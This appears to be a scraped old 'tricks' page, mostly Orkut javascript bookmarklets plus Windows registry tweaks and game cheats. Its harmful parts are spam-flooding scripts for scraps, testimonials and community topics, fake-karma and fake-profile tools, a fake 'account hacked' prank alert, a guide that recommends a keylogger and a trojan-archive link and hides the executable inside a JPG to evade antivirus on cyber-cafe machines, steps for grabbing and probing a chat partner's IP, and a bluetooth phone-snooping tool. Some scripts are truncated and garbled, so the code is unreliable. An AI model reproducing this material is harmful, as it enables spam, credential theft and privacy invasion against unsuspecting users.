[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\test]
“Path”=”test.exe”
“Startup”=”c:\\test”
“Parameters”=”"
“Enable”=”Yes”
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\]
This key specifies that all applications will be executed if ICQNET Detects an Internet Connection.
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] =”Scrap object”
“NeverShowExt”=”"
This key changes your file’s specified extension.
Collection of orkut tricks
1)The Most Wanted
• Orkut Flooder
1. please don't misuse this code
2. your account will get freeze for some time
3. who cares
copy and paste this code in your Scrapbook's Address Bar
javascript:i=0;sar=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='';document.forms[1].target='TextFlooding';setInterval(" document.getElementsByTagName('TEXTAREA').item(0).value=sar +' '+ i;a=submitForm(document.forms[1], 'submit', '');i++",2000);void(0)
COMPLETELY WORKING.. PLEASE LEAVE COMMENTS IN CASE OF ANY PROBLEM..
________________________________________
2)Trick Number Two "STAR":
Try ★ in your scrap book editor box above your Scraps and Write Your Message
Voila!! a STAR comes up Before ur Message. isnt it Cool
Drop in Your Comments Please
also see trick : 21
________________________________________
3) Secret Writings in Orkut :
I came across the tip some time back which will allow you to write scraps in reverse order... more like mirror image llits quite common now but Still
write this code at the beginning of the scrap without quotes
"‮"
________________________________________
4) Many of u Won't Know this
You can see where all of your Orkut friends are located by checking out the new "friends map" feature. This feature combines Google Maps and Orkut profiles to let you see where all of your friends live around the world. To see the "friends map," just follow these steps:
1. Click the "view friends" link in the "my friends" box on your Orkut homepage.
2. Click the "friends map" tab at the top of the page.
You can click on a friend’s profile picture to see their location on the map. Please know that if we don't have map data for a particular region or if your friend chose not to put their location in their Orkut profile, you'll see a message "(not on map)" below their profile name.
You can also click on the "tiny little blue men" to see your friends' locations. By clicking on one of these figures, a bubble will pop open to let you know which friend lives in that location.
Trust me an Intelligent Feature of Orkut
While U are signed in at Orkut : click in The Link Below: its Gr8
Or copy and Paste the following in Your Address Bar
http://www.orkut.com/Map.aspx
Click here : Shaswat
________________________________________
5)Watch the Pictures of your Friends in Action:
copy and paste this code in your Scrapbook's Address Bar
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i
javascript:function cmd(){window.location="/setkarma?cat=0&val=3&gid=FRUS*******/US*******";}void(setInterval(cmd,2000));
5) Hit ENTER key of your keyboard. The page will keep on reloading and your fans will keep on increasing with an approximate speed of 6 fans per second until you close the window.
________________________________________
13) Mirror Links
These links if clicked redirects the person who clicked to his/her profile..
U can use these in Your Profile like :MY best frnd" and any one who clicks on these links u define will see hes/her own profile.
this will give out d profile:
http://www.orkut.com/Profile.aspx???2pi ... 0896443124
this will give out the Album :
http://www.orkut.com/AlbumView.aspx?2ui ... 4569816171
this will give out the Scrapbook :
http://www.orkut.com/Scrapbook.aspx?2ui ... 0034274333
________________________________________
14) Make your Page Colorful
1) Open your scrapbook.
2) Copy the following text and paste it in your address bar
javascript: i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);
3) Hit ENTER key
________________________________________
15) A Java Trick that Pops Message " Ur Account Is Hacked"
javascript:function reverse() { var inp = " ! luhaR yb dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse(); copy and paste d Above link On Address Bar.. n replace "luhaR" by ur own Name.. n send it to ur friends Or u can Manually create Any kind of Alert Box by javascript:alert(" TYPE ANY MESSAGE HERE TO APPEAR IN ALERT BOX ") copy and paste d above in the address Bar, ________________________________________ 16) Watch the Pictures With a Snake Effect javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0) ________________________________________ 17) Negative Posts : u see the Posts in negative numbers javascript:sar=document.getElementsByTagName('input');document.body.innerHTML+='';document.forms[1].target='NegFlood';omdt_lowposts=setInterval("sar['topicId'].value='';sar['commId'].value='';sar['messageId'].value='';submitForm(document.forms[1],'delete','')", 1000);void(0)
Note: You need to be the author/Creator of the topic in the Community to be able to use this .......
________________________________________
18) Try These Cool Font Generators : Its Easy
First Write Your Message in the Scrap Text Box . After you Are Done with typing your message
Simply Copy and Paste these Links In the Address Bar above the same page( scrapbook page )
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Å");txt.value=txt.value.replace(/B/gi,"ß");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ð");txt.value=txt.value.replace(/E/gi,"Ë");txt.value=txt.value.replace(/F/gi,"ƒ");txt.value=txt.value.replace(/i/gi,"î");txt.value=txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value.replace(/r/gi,"®");void(0);
This is the Second One
javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y
When someone click on this the person will be logged out from his/her orkut session
________________________________________
20) Speed up Logging to Orkut.
Bookmark the following link and use it to login into orkut!
https://www.google.com/............www. ... Login.aspx
The above link directly opens orkut login box! So it is faster than normal orkut login.
try it. u ll love it
________________________________________
21) Adding Special Symbols in Scraps !!!!!!!!!!!!!!!
This is a much awaited trick on Orkut
very less users know about it
be d one n Impress your friends !!
here it is
Press alt key and d following 4rm num pad ...
alt + 987 - █
alt + 1 - ☺
alt + 2 - ☻
alt + 3 - ♥
alt + 4 - ♦
alt + 5 - ♣
alt + 6 - ♠
alt + 7 - •
alt + 8 - ◘
alt + 9 - ○
alt + 0178 - ²
alt + 0489 - é
alt + 0756 - ô
alt + 0742 - æ
alt + 0719 - Ï
alt + 0739 - ã
alt + 0729 - Ù
the same way many combinations can be tried..
keep trying it and do upload it here as comments
________________________________________
22) Crush List On Orkut!! full Explanation
Have you ever wondered how the Orkut "Add to my crush-list" option works?
Most of us are scared to add someone to our crush-list because of the fear that he/she will get a notification from Orkut that you have added him/her on your crush-list.
YES, they will get such a notification. But that is only if they too add you on their crush list. In fact, you both will get a message from Orkut if you both have added each other on your respective crush lists.
This is a fantastic piece of innovation from Orkut wherein one-side crushes will not be notified and if mutual crush exists, then both sides will come to know of it.
Spreading this information is important. It will help the cause of many people and who knows, you may be the lucky one too!!!
So start adding people to your crush-lists now and spreading this vital information!!!
________________________________________
23) Write scraps in Hindi !
Right click on the link below n open it in a new window !
click here to write in Hindi
Go to Quill pad for Hindi, Telugu, Tamil, Kannada, Malayalam and Marathi.
________________________________________
24) Decrease count of posts in a community !
You must be the Author of the post to perform this trick.
Open the thread which is started by you
Copy the following code and paste in the URL bar.
javascript:sar=document.getElementsByTagName
('input');document.body.innerHTML+='';document.forms[1].target='NegFlood';omdt_lowposts=
setInterval("sar['topicId'].
value='';sar['commId'].value='';sar['messageId'].value='';
submitForm(document.forms[1],'delete','')", 1000);void(0)
________________________________________
25) See All Pictures Of Album In Full-size At A Time !!
Use This CODE:
javascript:d=document.body.innerHTML; m=d.match
(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi);
for(z=0;z")};void(0)
*Method To Use*
Open Andbody's Album You Want To See
Just Paste This CODE & (Press Enter)or(GO)
it works
~cheers ~
________________________________________
26) Crazy script: !!
javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c)
{return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;
DIS.position='absolute';DIS.left=A(5,100,500);
DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
________________________________________
27) Have LONGGGGGGGGGGGGGGGGGG Name .. Best one !!
create a new profile.
and while u sign up on google account page
first run this script
javascript:var i=0;function de(){i=i+1;document.forms[0].elements
[10].maxlength=200;}void(setInterval(de,300));
then run this script
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[11]
.maxlength=200;}void(setInterval(de,300));
then write a first name of exacty 200 words. no more
then write the second name of exactly 200 words. no more
thats all.
-----------------------------------
the purpose of the script is to limit u to 200 so that u wont excede the google limit
-----------------------------------
________________________________________
28) Testimonial flodder !! The Best one .. never seen
javascript:var i=0;function hkhj(){i=Math.floor(Math.random()*123467891234567890987654321);
document.getElementById('countedTextbox').value="Soo how you like this messing up with me \n
Orkut Testimonial Flooding Script \n Programmed By \nhttp://shaswat.bravehost.com \n Counter:: "+i;
submitForm(document.getElementsByTagName('tr').item(15),'submit','');}void(setInterval(hkhj,750));
perfect one
i dont need to tell u what to do. !
please post a comment if u liked it !!
________________________________________
29) Scripts for Flooding Replies in Topic !!
javascript:function cmd(){var msg="your message here";
var i=Math.floor(Math.random()*987668764);document
.getElementsByTagName('input').item(2).value
=msg;document.getElementsByTagName('TEXTAREA').
item(0).value=msg+"counter:::"+i;document.getElements
ByTagName('input').item(6).click();}void(setInterval(cmd,350));
dose who can trick how to run dis will only be able to run it
m sorry cant disclose it or i will be kicked out of many communities..
but one thing is for sure it works
~cheers~
________________________________________
30)Community Topic Flooder !!
javascript:i=0;sar=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML
+='';document.forms[1].target='TextFlooding';
setInterval("document.getElementsByTagName('TEXTAREA').item(0).value=sar
+' '+ i;a=submitForm(document.forms[1], 'submit', '');i++",2000);void(0)
same here buddies u have to crawl ur way to run it.. it works n is easy to do so !!
________________________________________
31) Join Communities in Bulk !!
Just Put Any Community Id You Want To Join For Ex :cmm=18256080
5o,75,100 How Many You Want
And Open Your Scrapbook.aspx?
Paste The code It Will Join All Communities According to Comm Id's Given In The Script
code:
javascript:i=0;cmm="6348046","7579260","6349476","
17726544","18601321","117201","5139875","4634310"];
a=document.forms[1]; a.target='f'; setInterval("i++;a.action='CommunityJoin.aspx?
Action.join&cmm='+cmm[i%cmm.length];a.submit()",5000);
how's Dat!!
________________________________________
32) Make yourself invisible !!
Hey there .. ll i was thinking about it from past so long.. but it was really easy just d case it dint strike me..
however here i present dis flawless trick !!
in ur names(first and last)
hold "alt" n while holding it type 0160 4rm da number pads on da write sides..
type this thing in ur first as well as last name...u'll get it
or
on the first and last name section
while holding down up button press enter +insert button together.
simply erase your picture n u are invisible now !!
what's say??
do post your comment if u can defy laws and can create some cool trick !!
________________________________________
33) SURF ORKUT EVEN FROM PLACES WHERE ITS BLOCKED!!!!
here are some proxys..
just type in http://www.orkut.com in companies or colleges where its blocked n enjoy
• http://www.mathtunnel.com
• http://www.gravitywars.com
• http://www.kproxy.com
• http://www.calculatepie.com
• http://www.anonymizer.com/
post more if u know them !!
________________________________________
34) Scrap Formatter !!
right click and open in a new window.. this is a good tool
click here
________________________________________
35) Amazing Smiles !!
right click and open in a new window.. this is a perfect tool
click here
________________________________________
36) Delete Topic from a community !!
You need to be the creator of the topic. You NEED NOT be the owner of the community.
Open the topic created by YOU.
Copy the following code and paste in the URL bar.
javascript:submitForm(document.forms[1],'delete_entire_topic','');void(0)
________________________________________
37) Secret messages : good one
You can send a secret message to your friends from these sites.
Enter any one the following sites. Enter your message in the text box and click ENCRYPT (click it as many times as you want to make it more secure)
Copy the encrypted code and paste it in the scrapbook of your friend. Your friend can copy this code and paste it in the same page and click DECRYPT till he get meaningful message.
Here are the links - Onnet and Crazy Souls.
This is not a secure way as any one can copy the message and decrypt it till they get a meaningful message.
________________________________________
38) This is d Orkut Statistics Page ...
Get 2 know who dominates Orkut ....
http://www.orkut.com/MembersAll.aspx
________________________________________
39) How old r u at Orkut ?????
U want to no u are which member 2 join Orkut ????
Right click on the profile photo and opt for 'save image as'. You would see a number for your photo, that's the Orkut membership no.
E.g.. You are 22,335,123.
________________________________________
Access ORKUT On Your Mobile Phone or PDA
Here is a tip for all Orkut users… Have you ever tried to access Orkut on your mobile browser, or even OPERA MINI. If you have tried, you must surely know what happens……….
Let me tell u for those who have not tried it..
The login box does not appear…. As a result you cannot sign in and therefore, to say as a whole, ORKUT CANNOT BE ACCESSED ON MOBILE!!!!!
But here is a trick for all to ACCESS ORKUT ON YOUR MOBILE.. You need to do nothing, just follow the link-
https://www.google.com/accounts/Serv....aspx&hl=en-US
And you will see that only the login-box appears, just sign in and there you are…
The whole ORKUT at your hands!!!!
If you lose this link,, here is how to get it.. when you open http://www.orkut.com on your pc. The login box loads in a different frame.., In Firefox, right click on this frame and Select load this frame only, and the link you get for that frame is this link.
Actually what happens is that we load only this frame and not the others..
View Friends Scrap more Than the Limit
View Friends Scrap more Than the Limit
Step1: Open Friends scrapbook
Step2: Look in your address bar (i.e the place where u type http://www.orkut.com). You will see this address written
http://www.orkut.com/Scrapbook.aspx?uid ... 8987654321
Step3: Add this code"&na=&nst=&nid=&pageSize=30" at the end of the address. It will look like this
http://www.orkut.com/Scrapbook.aspx?uid ... ageSize=30
30 over specifies that you can view 30 scraps of the scrapbook you are looking into.
keyloggers in photo
HERE ARE SOME KEYLOGS I RECOMEND SKL ITS A EASY ONE JUST DOWNLOAD IT
AND TRY TO LOAD IT...................
IN THE EMAIL OPTION GIV UR YAHOO ID AND SERVER USE YAHOO MAX4 ITS THE BEST THEN
hxxp://www.trojanfrance.com/index.php?dir=KeyLoggers/
replace xx to tt
now you are half way arround...................
Step 1: You will need two files - the file in which you have ur keylogger and one jpg image - it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]
Step 2: Copy the above two files to the C: folder and open the command prompt window.
Step 3:Move to the c: root by typing cd \ [if the files are in another folder, you'll have to change the prompt to that folder]
Step 4: The most important step - type the following command:
Code:
copy /b myimage.jpg + file.exe my_new_image.jpg
now the antivirus will not detect the keylogger take it to any cyber center as if he checks , the logger will be in the form of jpg .......................
To recover the original exe file, just rename my_new_image.jpg to filename.exe.
That's it - No advanced Steganography tricks involved here. Just remember to write the correct syntax of the copy command:
Code:
copy /b sourceimage.jpg + filetohide.exe targetimage.jpg
as some part of the trick i inherited but implementation no one would have thought it............................
any doubts bugs errors can be clarified as i have tried this trick...............100% working even today...............based on cmd commands only................
Fake Profile Maker!
Heres the Second Version
How to Use:
* Fill All The Details and Press Go
* Fill the Captcha on the Page
* Press I Accept on the Page
* Rest part, the Software will do
* And now please dont say tht its slow bcoz it depends on ur net speed
* Bug Fixed
Download Link:
http://rapidshare.com/files/65015008/Ga ... _.rar.html
or
http://solutionworld.co.in/Host/file.ph ... d852816184
ScreenShot:
http://i225.photobucket.com/albums/dd63 ... 11/scr.jpg
Enjoy!
Hacking pc while chating
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??
It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
mobile bluetooth hacker
Yes guys it is the super mobile bluetooth hacker
Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone" it includes all call functions like hold etc.
Notes:
1.) When connecting devices use a code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and downlaod it
download
enjoy and keep visiting us
All windows games cheats and cracks
Minesweeper
Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate the Gravity Well.
Secret - Instant PromotionInstructions - Type rmax at the start of a new game to go up in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 points
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting
FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game modes.
Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.
Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!
Infinite points trick II
To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game’s score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.
//—————————————————————–// registry hack which will allow you to see your opponents’ cards//—————————————————————– Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to “ZB” (without the quotes); give it a value of “42″ (again, sans quotes). The next time you’re in a game of Hearts, press CTRL + SHIFT + ALT + F12.